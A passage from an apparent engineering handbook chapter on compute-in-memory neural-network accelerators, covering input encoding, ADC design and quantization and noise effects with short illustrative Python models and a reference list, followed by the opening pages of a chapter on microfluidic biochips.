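A behavioral sketch of this 2x/1x branch weighting follows; the unit current is an assumed constant, not a value from the cited designs.

```python
# Behavioral model of the compute cell in Fig. 13c: the MSB branch (N1-N3)
# is sized 2x the LSB branch (N4-N6), so the summed discharge current is
# proportional to a 2-bit input times a 1-bit weight.
i_unit = 1.0  # assumed unit branch current

def compute_cell(in_msb, in_lsb, weight):
    return weight * (2 * i_unit * in_msb + i_unit * in_lsb)

for x in range(4):                       # sweep all 2-bit inputs
    msb, lsb = (x >> 1) & 1, x & 1
    assert compute_cell(msb, lsb, 1) == x * i_unit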
Input Encoding
The inputs of neural networks are usually mapped to voltage pulses in a CIM system. Input encoding schemes fall into three types: amplitude-based modulation, time-domain modulation, and binary encoding (as shown in
Fig. 14). For amplitude encoding, digital-to-analog converters (DACs) are essential to encode the digital inputs as voltage pulses of different amplitudes.
Fig. 14 Input encoding schemes for the digital inputs of a CIM array: amplitude encoding (resistive/capacitive DAC), time encoding (pulse count or PWM DAC), and binary encoding (bit-serial parallel processing)
Typical DAC designs, including capacitive circuits and resistive ladders, introduce additional
area overhead and power consumption. Multi-level input voltages can also be implemented with multiple power-supply sources to perform multi-bit operation. The area overhead introduced is small compared to the DAC approach, but it increases the load on the on-chip power unit. In general, the downside of such amplitude-dependent encoding is that the number of voltage levels is limited by the narrow signal swing in the voltage domain and by the current-voltage linearity of the memory cell.
For time-domain modulation, the number of pulses can directly encode the input information. Alternatively, a pulse-width-modulation (PWM)-based DAC can be employed to encode multi-bit inputs as varying pulse widths. Naturally, the computation time of time-dependent encoding is much longer than that of amplitude encoding. However, time encoding is much less affected by current-voltage nonlinearity, which makes it appealing for achieving more accurate results. Additional advantages of PWM encoding are its simple single-voltage bias design and the ease of signal propagation between sub-arrays without an explicit ADC at the output node (Chang et al. 2019).
For binary encoding, multi-bit inputs are sent sequentially to the CIM array (i.e., bit by bit) and processed in a bit-serial, parallel fashion. Additional circuits, such as registers and shifters, are required to combine the sequential data. In this way, input DACs can be eliminated entirely in favor of less expensive digital circuits. Compared to time-dependent encoding, binary encoding offers higher throughput and is therefore widely used in CIM designs. In practice, since the dynamic range of the outputs from the circuits/devices is limited, inputs are usually limited to 1-2 bits per cycle, no matter which input encoding method is used.
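A compact model of bit-serial binary encoding with the digital shift-add that recombines the per-cycle partial sums (array sizes and bit widths are illustrative):

```python
import numpy as np

def bit_serial_mac(inputs, weights, in_bits=4):
    """Binary input encoding: send one input bit per cycle (MSB first),
    let the array compute a 1-bit-input MAC, and shift-add digitally."""
    acc = np.zeros(weights.shape[1], dtype=np.int64)
    for b in range(in_bits - 1, -1, -1):
        in_bit = (inputs >> b) & 1            # one bit of every input
        partial = in_bit @ weights            # what the array computes this cycle
        acc = (acc << 1) + partial            # shift-add combines the cycles
    return acc

x = np.random.randint(0, 16, size=64)         # 4-bit inputs
w = np.random.randint(0, 2, size=(64, 32))    # 1-bit weights
assert np.array_equal(bit_serial_mac(x, w), x @ w)
```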
Output Sensing
For output sensing, in most of today's CIM designs the memory array is equipped with ADCs to convert the analog MAC values to digital outputs. The digital signal can be passed to the peripheral circuitry for further processing steps, such as the activation function and pooling, and then sent to the next array as its input. This mixed-signal computing scheme offers scalability toward tiled hierarchical designs via interconnect buses or networks-on-chip, while introducing additional power dissipation and area overhead for the necessary data conversion at the array outputs.
The raw output of a MAC operation performed by the CIM crossbar is typically
in the form of a current. Current-mode ADCs are required for direct sensing, while
voltage-mode ADCs can be employed after the current-to-voltage conversion. A
resistor divider or a trans-impedance amplifier (TIA) is commonly used to convert
the current to voltage. The ADC design plays an important role in CIM, as it contributes substantially to the area and energy consumption of the CIM array. From the algorithm's viewpoint, although binary neural networks such as XNOR-Net (Rastegari et al. 2016) may greatly reduce the required memory capacity and even replace ADCs with simple binary sense amplifiers (SAs), multi-bit precision is the more generic setting for large-scale DNNs to avoid inference accuracy degradation. To reduce the overhead of ADCs, several alternatives have been proposed. One is to share one ADC among multiple columns; as a penalty, the parallelism of CIM is reduced, lowering throughput. The other is to lower the ADC precision; however, the quantization loss on the partial sums may then hamper accuracy
to the design of the CIM architecture. Several candidates of ADCs, such as Flash-
ADC (Yin et al. 2020a) and successive-approximation-register (SAR)-ADC (Chen
et al. 2018a), have been explored in prior CIM designs due to their simplicity and
suitability for low to medium precision.
As shown in Fig. 15a, a Flash-ADC comprises a bank of parallel comparators; an N-bit converter employs 2^N − 1 of them. The thermometer code generated by the comparators is then encoded into the digital output code. Flash-ADC is in principle the fastest ADC design but consumes exponentially more power and area as the precision increases. Flash-ADC designs in resource-constrained CIM architectures are therefore usually restricted to low precision, such as 3 bits or below (Liu et al. 2018), to ensure good performance, and are mostly used for small-scale arrays or partially turned-on rows.
While Flash-ADC offers high speed, SAR-ADC is competitive owing to its linearly increasing area/energy cost as the precision grows. As shown in Fig. 15b, a SAR-ADC uses a single comparator and performs one bit of comparison per internal clock cycle. Based on binary search, the SAR logic (implemented with multi-stage shift registers) adjusts the reference dynamically and makes the comparisons bit by bit, proceeding from MSB to LSB. Once all bits are resolved, the conversion is complete, and the N-bit digital output is available in the register.
Fig. 15 (a) Diagram of Flash-ADC; (b) diagram of SAR-ADC; (c) diagram of analog shift-add
ADC. (With permission of Jiang et al. 2021)
Typically, a capacitive DAC array that exploits charge redistribution is used to generate the analog reference voltage. To support successive current-mode sensing, a multi-level current sense amplifier (ML-CSA) is proposed in Chen et al. (2018a); the reference current (generated by a reference array) for each sensing step is selected by the previous output signal.
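The SAR binary search can be summarized in a few lines; an ideal comparator and DAC are assumed.

```python
def sar_adc(v_in, v_ref=1.0, bits=5):
    """Binary-search SAR conversion: one comparison per bit, MSB to LSB,
    with the DAC reference re-centered after every decision."""
    code = 0
    for b in range(bits - 1, -1, -1):
        trial = code | (1 << b)                  # tentatively set this bit
        v_dac = trial * v_ref / (1 << bits)      # capacitive-DAC reference level
        if v_in >= v_dac:                        # single comparator decision
            code = trial                         # keep the bit
    return code

print(sar_adc(0.42))   # 5-bit code for 0.42 V with a 1 V reference -> 13
```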
To reduce the ADC overhead, an analog shift-add approach for binary input encoding is demonstrated in Su et al. (2020). The top-level diagram of the analog shift-add ADC is shown in Fig. 15c. Here, the shift-add over the weight significance is moved ahead of the ADC and conducted in the analog domain using a capacitor array. The charge-redistribution nature of the capacitor array is exploited to perform the weighted accumulation before ADC quantization. Once the charge redistribution settles, the pre-shifted-and-added MAC value is quantized by a regular SAR-ADC to generate a final output that already contains the weight significance. This design eliminates the digital shift-adders for multi-bit weight computation and reduces the MUXes across multiple columns, thus improving throughput and energy efficiency under the same area constraint.
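The toy model below contrasts the two orderings of quantization and shift-add for one 4-bit weight; it only illustrates the dataflows, since the actual accuracy trade-off (see Fig. 17) depends on the array size, ADC precision, and data statistics.

```python
import numpy as np

def adc(x, bits, full_scale):
    # Ideal uniform quantizer standing in for an N-bit ADC.
    levels = 2 ** bits - 1
    return np.round(np.clip(x, 0, full_scale) / full_scale * levels) * full_scale / levels

rng = np.random.default_rng(0)
cols = rng.uniform(0, 511, size=4)     # analog partial sums of 4 weight-bit columns
sig = np.array([8.0, 4.0, 2.0, 1.0])   # column significance (MSB..LSB)

# Conventional dataflow: quantize every column first, then digital shift-add;
# each column's quantization error is scaled by its significance and summed.
digital = np.sum(adc(cols, bits=6, full_scale=511) * sig)

# Analog shift-add dataflow: weight and sum in the analog domain (charge
# redistribution on the capacitor array), then quantize once at the end.
analog = adc(np.sum(cols * sig), bits=6, full_scale=511 * 15)

exact = np.sum(cols * sig)
print(abs(digital - exact), abs(analog - exact))
```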
As mentioned above, the quantization loss introduced by ADCs may decrease accuracy. To determine the minimally required ADC precision, the impact of ADC quantization loss should be evaluated. In general, the smaller the sub-array and/or the lower the cell precision, the more relaxed the requirement on the ADC quantization. Figure 16 shows an analysis of the ADC quantization effect on a CIFAR-10 classification task with a VGG-8 network (Peng et al. 2019). For the case with the smallest partial-sum range, a 64 × 64 array with 1 bit per cell, the full precision of the partial sum is 6 bits, so a 5-bit ADC introduces a 1-bit loss. It can be seen that, for the same sub-array size, the accuracy drops as the bits per cell increase if the same ADC precision is used. For the same cell and ADC precisions, the accuracy likewise drops as the sub-array size increases. As a specific case, a 5-bit ADC is necessary for a 256 × 256 array with a 4-bit/cell design.
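The partial-sum precision convention used in these numbers can be reproduced with a small helper matching the text's examples:

```python
import math

def partial_sum_bits(rows, cell_bits=1, input_bits=1):
    # Convention used in the text: a column of 1-bit products over `rows`
    # rows needs log2(rows) bits; each extra cell or input bit adds one bit.
    return int(math.log2(rows)) + (cell_bits - 1) + (input_bits - 1)

print(partial_sum_bits(64, 1))        # 6, the 64x64 1-bit/cell example above
print(partial_sum_bits(512, 1))       # 9-bit column partial sum (512x512 array)
print(partial_sum_bits(512, 1) + 4)   # 13-bit after the 4-bit weight shift-add
```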
Figure 17 shows the accuracy performance vs. ADC precision for conventional ADC designs (representing both Flash- and SAR-ADC) and the proposed analog shift-add ADC (Jiang et al. 2021).
Fig. 16 Accuracy performance vs. ADC precision for different memory array configurations (64 × 64, 128 × 128, and 256 × 256 arrays; baseline accuracy 92%). Simulations on VGG-8 network for CIFAR-10 dataset. (With permission of Peng et al. 2019)
Fig. 17 Accuracy performance vs. ADC precision (3-7 bits) for the analog shift-add ADC and conventional ADCs (baseline accuracy 89%). Simulations on VGG-8 network for CIFAR-10 dataset
The assumption is 4-bit weight precision (one bit per cell) with a 512 × 512 memory sub-array, which means the full precision of each column's partial sum is 9 bits. Here Flash-ADC and SAR-ADC are grouped together since they share the same dataflow, in which ADCs first quantize the partial sums and digital shift-add modules then accumulate the digitized partial sums. Oppositely, the analog shift-add ADC first weighs and sums the analog multi-bit MAC outputs and then quantizes the final output, which already contains the weight significance. These two quantization approaches are embedded in software simulation to investigate the impact of ADC quantization loss on inference accuracy for the CIFAR-10 dataset.
For conventional ADCs, a 3-bit quantization loss is tolerable. For the analog shift-add ADC, the full input precision of the partial sum is 13 bits (9 bits from the column partial sum and 4 bits from the shift-add over the weight precision). From the plot, it is observed that a 6-bit analog shift-add ADC maintains the baseline accuracy, actually tolerating a 7-bit quantization loss. The analog shift-add ADC tolerates more quantization loss because quantization happens only at the final stage. On the contrary, conventional ADCs incur quantization loss on each partial sum and then accumulate these quantized partial sums by shift-add, so the errors accumulate. In sum, the analog shift-add before the ADC preserves more information, while the digital shift-add after the ADC may lose residual information, resulting in more error in the final output. The trend is expected to be similar for other networks and tasks. Nevertheless, the ADC-induced accuracy loss requires empirical simulations and case-dependent analysis for different datasets.
To reduce the ADC overhead and the associated design effort, some designs activate only a part of the sub-array in parallel per cycle and use multiple cycles to finish the MAC for the full array (e.g., Li et al. 2021). The ADCs used in these designs could theoretically introduce no quantization loss, since the full precision of the partial sum is reduced accordingly. Beyond quantization loss, however, ADC quantization raises further challenges. Unlike
the precise quantization of a digital partial sum, ADC quantization of the analog signal can be noisy owing to both static and dynamic uncertainties. The static uncertainty is introduced by process variation and is dominated by the ADC offset caused by transistor mismatch. The ADC offset may cause quantization errors when converting the analog partial sum to the digital signal; it may thus noticeably degrade the inference accuracy and cause different chip instances to produce different inference results even for the same input. As shown in Fig. 18, a 5-bit Flash-ADC and a 5-bit SAR-ADC are evaluated by SPICE Monte Carlo simulations using a foundry 40 nm PDK, assuming local variations, for an RRAM CIM array. The error caused by the ADC offset varies with the ADC type, the sense-amplifier size (W/L), and the ADC output level. Flash-ADC introduces less error than SAR-ADC with the same sense-amplifier size at the same level, because Flash-ADC has multiple SAs sensing the different levels in parallel; their individual errors may thus compensate each other when summed by the thermometer-to-binary (TM2B) encoder. For the same type of ADC, a smaller SA is affected more by the process variation, thus introducing more error.
Fig. 18 Simulated ADC output with offset based on the sense pass rate for different W/L ratio.
Simulations on VGG-8 networks for CIFAR-10 dataset. (With permission of Huang et al. 2021)
Fig. 19 Measured ADC vs. ideal ADC outputs from a 90 nm RRAM CIM macro showing the
effectiveness of the reference fine-tuning. (With permission of Yin et al. 2020b)
The quantization error increases as the partial sum increases because, when the column current goes up, the effective resistance of the RRAM pull-down network decreases; the voltage levels to be sensed therefore lie closer together. Since the accuracy of the SA largely determines the ADC error, one way to address this problem is to use more advanced offset-cancelled SAs that reduce the variation-induced mismatch (Xue et al. 2019). On the other hand, since the static offset does not change over time once the chip is fabricated, it can be compensated by fine-tuning the ADC references (Yin et al. 2020b) or the model weights, with hybrid retraining on-chip (Huang et al. 2021). Figure 19 shows the error pattern of eight 3-bit ADCs shared by 64 columns of an RRAM-based CIM chip fabricated at 90 nm (Yin et al. 2020b). Figure 19a shows that when all the ADCs use the same reference set, the measured ADC outputs are widely dispersed. The error decreases significantly when each ADC has its own reference set, as shown in Fig. 19b. Further increasing the number of reference sets to one per column brings only marginal improvement, as shown in Fig. 19c, since one reference set per ADC can already fully compensate for the SA offset. However, fine-tuning every ADC reference introduces substantial hardware overhead. Another method to compensate for the ADC offset is to retrain the model so that the weight patterns adapt to each chip's ADC offset pattern. The hybrid retraining method performs FF on-chip while executing EC and GC off-chip in software; the ADC offset is thus incorporated during the weight fine-tuning. Figure 20a, b shows an example of CIFAR-10 classification on the VGG-8 network with 2-bit weights and 8-bit activations. The software accuracy after quantization is ∼92%. Considering the ADC offset, the accuracy drops to 89.48% for W/L = 2, 90.26% for W/L = 3, and 89.91% for W/L = 4 when Flash-ADC is used, while it drops to 81.65% for W/L = 2, 84.16% for W/L = 3, and 86.14% for W/L = 4 when SAR-ADC is used. After model retraining with weight fine-tuning, the accuracy recovers to ∼91% in all cases. Dynamic noise, in contrast, is mainly introduced by temporal effects, such as device read noise, VDD disturbance, etc. It is much more difficult to eliminate, as it varies over time. For ADC quantization, this means that the current/voltage margin between levels at the sensing node must be large enough to tolerate the noise.
Fig. 20 Retraining accuracy curves for inference chips equipped with Flash-ADC and SAR-ADC.
(With permission of Huang et al. 2021)
Fig. 21 Measured ADC vs. ideal ADC outputs with dynamic noise only from a 40 nm RRAM
CIM macro and the nonlinear mapping between the BL voltage and the expected ADC output
partial sum. (With permission of Li et al. 2021)
Figure 21 shows an example of the 3-bit ADC input/output mapping of a 40 nm RRAM CIM array with fine-tuned references, measured over 10,000 input test vectors, which means the ADC offsets are already compensated (Li et al. 2021). Ideally, the measured ADC output should match the expected one; however, dynamic errors appear because of the dynamic noise. The noise affects higher partial-sum levels more than lower ones: as the partial sum grows, the margin between levels shrinks due to the nonlinear relationship between the sensing-node voltage and the partial-sum current in a resistive-divider configuration (Fig. 21b). To improve the linearity, a current source with a feedback amplifier has been proposed to linearize the sensing-voltage steps between the expected partial sums (Yoon et al. 2021). In addition, noise-aware training (e.g., with noise injection) can be used to converge the DNN model to a local minimum that is insensitive to parameter deviations when the model is deployed to the hardware (Long et al. 2019). From both the software-accuracy and hardware-cost points of view, it can be seen that the performance of the ADC is the key bottleneck for CIM architectures.
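Noise injection of this kind can be sketched as a multiplicative perturbation of the effective weights during training; the noise level below is an assumed illustrative value, not one from the cited work.

```python
import numpy as np

rng = np.random.default_rng(0)

def noisy_matmul(x, w, sigma=0.02):
    # Multiplicative weight noise emulating device/ADC non-idealities;
    # sigma is an assumed relative noise level, not a measured value.
    w_noisy = w * (1.0 + rng.normal(scale=sigma, size=w.shape))
    return x @ w_noisy

# During training, every forward pass sees a fresh noise sample, pushing
# the optimizer toward minima that are flat with respect to weight noise.
x = rng.normal(size=(4, 16))
w = rng.normal(size=(16, 8))
print(np.abs(noisy_matmul(x, w) - x @ w).max())
```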
Simulation frameworks such as DL-RSIM (Lin et al. 2018) support training with noise injected to recover the performance loss caused by the non-ideal effects of the circuit. Such a simulator can thus help designers explore the deterministic or stochastic noise design space for CIM designs. With PyTorch
and TensorFlow wrappers, the DNN+NeuroSim framework (Peng et al. 2019) can also emulate DNN inference/training accuracy while considering hardware limitations and device non-idealities. Furthermore, the newly released 3D+NeuroSim can support electrical-thermal co-simulation of 3D-integrated CIM accelerators.
In general, the shift from conventional von Neumann architectures to CIM
architectures necessitates the rethinking of the whole framework from hardware
to software. The simulation platforms should bridge the gap between different
abstraction levels, including device, circuit, architecture, system, and accuracy sim-
ulation. Frequent updates/calibration and the integration of more functionalities are desired to validate CIM implementations. With the development of CIM accelerators, the
simulators will also become more comprehensive and accurate.
Conclusion
preferred, and the non-ideal noises should be further reduced. At the device level,
SRAM suffers from leakage power for standby-frequent applications while eNVMs
exhibit the weaknesses of asymmetry/nonlinearity in weight update, variations, and
expensive write, which are undesired for in-situ training. As device process tech-
nology becomes more mature with extensive industrial research and development,
further enhancements in device characteristics are expected. Better linearity, more
levels of states, fewer variations, and longer endurance are all desired for delivering
the promises offered by CIM architectures.
References
Ambrogio S, Gallot M, Spoon K, Tsai H, Mackin C, Wesson M, Kariyappa S, Narayanan P, Liu
CC, Kumar A et al (2019) Reducing the impact of phase-change memory conductance drift on
the inference of large-scale hardware neural networks. In: IEEE international electron devices
meeting (IEDM)
Chang HY, Narayanan P, Lewis SC, Farinha NC, Hosokawa K, Mackin C, Tsai H, Ambrogio S,
Chen A, Burr GW (2019) AI hardware acceleration with analog memory: microarchitectures
for low energy at high speed. IBM J Res Dev 63(6):8–1
Chen Y (2020) ReRAM: history, status, and future. IEEE Trans Electron Devices 67(4):1420–1433
Chen YH, Krishna T, Emer JS, Sze V (2016) Eyeriss: a spatial architecture for energy-efficient
dataflow for convolutional neural networks. IEEE J Solid State Circuits 52(1):127–138
Chen WH, Li KX, Lin WY, Hsu KH, Li PY, Yang CH, Xue CX, Yang EY, Chen YK, Chang YS,
Hsu TH (2018a) A 65nm 1Mb nonvolatile computing-in-memory ReRAM macro with sub-16ns
multiply-and-accumulate for binary DNN AI edge processors. In: IEEE international solid-state
circuits conference (ISSCC)
Chen PY, Peng X, Yu S (2018b) NeuroSim: a circuit-level macro model for benchmarking neuro-
inspired architectures in online learning. IEEE Trans Comput-Aided Des Integr Circuits Syst 37(12):3067–3080
Chi P, Li S, Xu C, Zhang T, Zhao J, Liu Y, Wang Y, Xie Y (2016) Prime: a novel processing-in-
memory architecture for neural network computation in reram-based main memory. In: 43rd
annual international symposium on computer architecture (ISCA), vol 44, p 27
Courbariaux M, Bengio Y, David JP (2015) Training deep neural networks with low precision mul-
tiplications. In: Workshop contribution at international conference on learning representations
(ICLR)
DeHon A (2000) The density advantage of configurable computing. Computer 33(4):41–49
Dong X, Xu C, Xie Y, Jouppi NP (2012) Nvsim: a circuit-level performance, energy, and area
model for emerging nonvolatile memory. IEEE Trans Comput-Aided Des Integr Circuits Syst
31(7):994–1007
Elliott DG, Stumm M, Snelgrove WM, Cojocaru C, Mckenzie R (1999) Computational RAM:
implementing processors in memory. IEEE Des Test Comput 16(1):32–41
Feng Y, Chen B, Liu J, Sun Z, Hu H, Zhang J, Zhan X, Chen J (2021) Design-technology co-
optimizations (DTCO) for general-purpose computing in-memory based on 55nm NOR flash
technology. In: IEEE international electron devices meeting (IEDM)
Gao L, Chen PY, Liu R, Yu S (2016) Physical unclonable function exploiting sneak paths in
resistive cross-point array. IEEE Trans Electron Devices 63(8):3109–3115
Giannopoulos I, Sebastian A, Le Gallo M, Jonnalagadda V, Sousa M, Boon M (2018) 8-bit
precision in-memory multiplication with projected phase-change memory. In: IEEE international
electron devices meeting (IEDM)
Gokmen T, Onen M, Haensch W (2017) Training deep convolutional neural networks with resistive
cross-point devices. Front Neurosci 11:538
He Z, Lin J, Ewetz R, Yuan JS, Fan D (2019) Noise injection adaption: end-to-end ReRAM cross-
bar non-ideal effect adaption for neural network mapping. In: ACM/IEEE design automation
conference (DAC)
Huang S, Jiang H, Peng X, Li W, Yu S (2020a) XOR-CIM: compute-in-memory SRAM
architecture with embedded XOR encryption. In: IEEE/ACM international conference on
computer-aided design (ICCAD)
Huang S, Sun X, Peng X, Jiang H, Yu S (2020b) Overcoming challenges for achieving high
in-situ training accuracy with emerging memories. In: Design, Automation & Test in Europe
Conference & Exhibition (DATE)
Huang S, Peng X, Jiang H, Luo Y, Yu S (2021) Exploiting process variations to protect machine
learning inference engine from chip cloning. In: IEEE international symposium on circuits and
systems (ISCAS)
Hubara I, Courbariaux M, Soudry D, El-Yaniv R, Bengio Y (2016) Binarized neural networks. In:
Conference on neural information processing systems (NIPS)
Ikegawa S, Mancoff FB, Janesky J, Aggarwal S (2020) Magnetoresistive random access memory:
present and future. IEEE Trans Electron Devices 67(4):1407–1419
Imani M, Gupta S, Kim Y, Rosing T (2019) FloatPIM: in-memory acceleration of deep neural
network training with high precision. In: ACM/IEEE 46th annual international symposium on
computer architecture (ISCA)
Jiang H, Peng X, Huang S, Yu S (2020a) CIMAT: a compute-in-memory architecture for on-chip
training based on transpose SRAM arrays. IEEE Trans Comput 69(7):944–954
Jiang H, Huang S, Peng X, Su JW, Chou Y-C, Huang WH, Liu TW, Liu R, Chang MF, Yu S
(2020b) A two-way SRAM array based accelerator for deep neural network on-chip training.
In: ACM/IEEE design automation conference (DAC)
Jiang H, Li W, Huang S, Cosemans S, Catthoor F, Yu S (2021) Analog-to-digital converter design
exploration for compute-in-memory accelerators. IEEE Des Test 39(2):48–55
Jouppi NP et al (2017) In-datacenter performance analysis of a tensor processing unit. In:
ACM/IEEE international symposium on computer architecture (ISCA)
Kawahara A, Azuma R, Ikeda Y, Kawai K, Katoh Y, Tanabe K, Nakamura T, Sumimoto Y, Yamada
N, Nakai N, Sakamoto S, Hayakawa Y, Tsuji K, Yoneda S, Himeno A, Origasa K, Shimakawa
K, Takagi T, Mikawa T, Aono K (2012) An 8Mb multi-layered cross-point ReRAM macro with
443MB/s write throughput. In: IEEE international solid-state circuits conference (ISSCC)
Keckler S, Kunle O, Hofstee P (2009) Multicore processors and systems. Springer, US
Khwa W-S, Chen JJ, Li JF, Si X, Yang EY, Sun X, Liu R, Chen PY, Li Q, Yu S, Chang MF (2018)
A 65nm 4Kb algorithm-dependent computing-in-memory SRAM unit-macro with 2.3ns and
55.8TOPS/W fully parallel product-sum operation for binary DNN edge processors. In: IEEE
international solid-state circuits conference (ISSCC)
Kim T, Lee S (2020) Evolution of phase-change memory for the storage-class memory and beyond.
IEEE Trans Electron Devices 67(4):1394–1406
Kim D, She X, Rahman NM, Chekuri VCK, Mukhopadhyay S (2020) Processing-in-memory-
based on-chip learning with spike-time-dependent plasticity in 65-nm CMOS. IEEE Solid-State Circuits Lett 3:278–281
Li C, Hu M, Li Y, Jiang H, Ge N, Montgomery E, Zhang J, Song W, Dávila N, Graves CE, Li
Z (2018a) Analogue signal and image processing with large memristor crossbars. Nat Electron
1(1):52–59
Li Y, Kim S, Sun X, Solomon P, Gokmen T, Tsai H, Koswatta S, Ren Z, Mo R, Yeh CC, Haensch
W, Leobandung E (2018b) Capacitor-based cross-point array for analog neural network with
record symmetry and linearity. In: IEEE symposium on VLSI technology
Li W, Huang S, Sun X, Jiang H, Yu S (2021) Secure-RRAM: a 40nm 16kb compute-in-
memory macro with reconfigurability, sparsity control, and embedded security. In: IEEE custom
integrated circuits conference (CICC)
Lin MY, Cheng HY, Lin WT, Yang TH, Tseng IC, Yang CL, Hu HW, Chang HS, Li HP, Chang
MF (2018) DL-RSIM: a simulation framework to enable reliable ReRAM-based accelerators
for deep learning. In: IEEE/ACM international conference on computer-aided design (ICCAD)
Liu R, Peng X, Sun X, Khwa WS, Si X, Chen JJ, Li JF, Chang MF, Yu S (2018) Parallelizing SRAM
arrays with customized bit-cell for binary neural networks. In: ACM/IEEE design automation
conference (DAC)
Liu Q, Gao B, Yao P, Wu D, Chen J, Pang Y, Zhang W, Liao Y, Xue CX, Chen WH, Tang J (2020)
A fully integrated analog ReRAM based 78.4 TOPS/W compute-in-memory chip with fully
parallel MAC computing. In: IEEE international solid-state circuits conference (ISSCC)
Long Y, She X, Mukhopadhyay S (2019) Design of reliable DNN accelerator with un-reliable
ReRAM. In: Design, Automation & Test in Europe Conference & Exhibition (DATE)
Lue HT, Hsu PK, Wei ML, Yeh TH, Du PY, Chen WC, Wang KC, Lu CY (2019) Optimal
design methods to transform 3D NAND flash into a high-density, high-bandwidth and low-
power nonvolatile computing in memory (nvCIM) accelerator for deep-learning neural networks
(DNN). In: IEEE international electron devices meeting (IEDM)
Luo Y, Peng X, Hatcher R, Rakshit T, Kittl J, Rodder MS, Seo JS, Yu S (2020) A variation
robust inference engine based on STT-MRAM with parallel read-out. In: IEEE international
symposium on circuits and systems (ISCAS)
Mikolajick T, Schroeder U, Slesazeck S (2020) The past, the present, and the future of ferroelectric
memories. IEEE Trans Electron Devices 67(4):1434–1443
Peng X, Huang S, Luo Y, Sun X, Yu S (2019) DNN+NeuroSim: an end-to-end benchmarking
framework for compute-in-memory accelerators with versatile device technologies. In: IEEE
international electron devices meeting (IEDM)
Peng X, Liu R, Yu S (2020) Optimizing weight mapping and data flow for convolutional
neural networks on processing-in-memory architectures. IEEE Trans Circuits Syst I Regul Pap
67(4):1333–1343
Presley RK, Haggard RL (1994) A fixed point implementation of the backpropagation learning
algorithm. In: Proceedings of SOUTHEASTCON
Rastegari M, Ordonez V, Redmon J, Farhadi A (2016) XNOR-net: ImageNet classification using
binary convolutional neural networks. In: European conference on computer vision (ECCV)
Ronen R, Eliahu A, Leitersdorf O, Peled N, Korgaonkar K, Chattopadhyay A, Perach B, Kvatinsky
S (2022) The bitlet model: a parameterized analytical model to compare PIM and CPU systems.
ACM J Emerg Technol Comput Syst 18(2):1–29
Shafiee A, Nag A, Muralimanohar N, Balasubramonian R, Strachan JP, Hu M, Williams RS,
Srikumar V (2016) ISAAC: a convolutional neural network accelerator with in-situ analog
arithmetic in crossbars. In: ACM/IEEE international symposium on computer architecture
(ISCA), vol 44, p 14
Shim W, Yu S (2021) Technological design of 3D NAND based compute-in-memory architecture
for GB-scale deep neural network. IEEE Electron Device Lett 42(2):160–163
Si X et al (2020) A 28nm 64Kb 6T SRAM computing-in-memory macro with 8b MAC operation
for AI edge chips. In: IEEE international solid-state circuits conference (ISSCC)
Simonyan K, Zisserman A (2015) Very deep convolutional networks for large-scale image
recognition. In: International conference on learning representations (ICLR)
Song L, Qian X, Li H, Chen Y (2017) PipeLayer: a pipelined RRAM-based accelerator for
deep learning. In: IEEE international symposium on high performance computer architecture
(HPCA)
Song T, Jung J, Rim W, Kim H, Kim Y, Park C, Do J, Park S, Cho S, Jung H, Kwon B, Choi
H-S, Choi J, Yoon JS (2018) A 7nm FinFET SRAM using EUV lithography with dual write-
driver-assist circuitry for low-voltage applications. In: IEEE international solid-state circuits
conference (ISSCC)
Su JW et al (2020) A 28nm 64kb inference-training two-way transpose multibit 6T SRAM
compute-in-memory macro for AI edge chips. In: IEEE international solid-state circuits
conference (ISSCC)
Sun X, Yu S (2019) Impact of non-ideal characteristics of resistive synaptic devices on implement-
ing convolutional neural networks. IEEE J Emerg Sel Top Circuits Syst 9(3):570–579
Sun X, Wang P, Ni K, Datta S, Yu S (2018) Exploiting hybrid precision for training and inference:
a 2T-1FeFET based analog synaptic weight cell. In: IEEE international electron devices meeting
(IEDM)
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 688
Flow-Based Microfluidic Biochips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 690
Design Tasks for FBMBs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 691
Design Automation for FBMBs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 693
Synthesis Methods for the Flow Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 693
Synthesis Methods for the Control Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 696
Synthesis Methods for the Codesign of the Control and Flow Layers . . . . . . . . . . . . . . . . . 699
Digital Microfluidic Biochips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
Technology Platforms and Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 701
Synthesis Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 704
MEDA Biochips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 707
Hardware Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 708
MEDA Evolution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 711
Synthesis Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 712
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 718
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 719
X. Huang
School of Computer Science, Northwestern Polytechnical University, Xi’an, China
e-mail: [email protected]; [email protected]
T.-C. Liang · Z. Zhong
Department of Electrical and Computer Engineering, Duke University, Durham, NC, USA
e-mail: [email protected]; [email protected]
T.-Y. Ho
Department of Computer Science and Engineering, The Chinese University of Hong Kong, Hong
Kong, China
e-mail: [email protected]; [email protected]
K. Chakrabarty ()
School of Electrical, Computer and Energy Engineering, Arizona State University, Tempe,
AZ, USA
e-mail: [email protected]; [email protected]
Abstract
Keywords
Introduction
For the past few years, commercialization of microfluidics has been one of
the main drivers for researchers developing lab-on-a-chip technology. There is a
tremendous potential for growth in lab-on-a-chip technologies as more discoveries
are made. A summary of the current microfluidic products is presented in Table 1.
Several companies have transitioned microfluidic platforms to the marketplace, each
with different design paradigms and varying degrees of success.
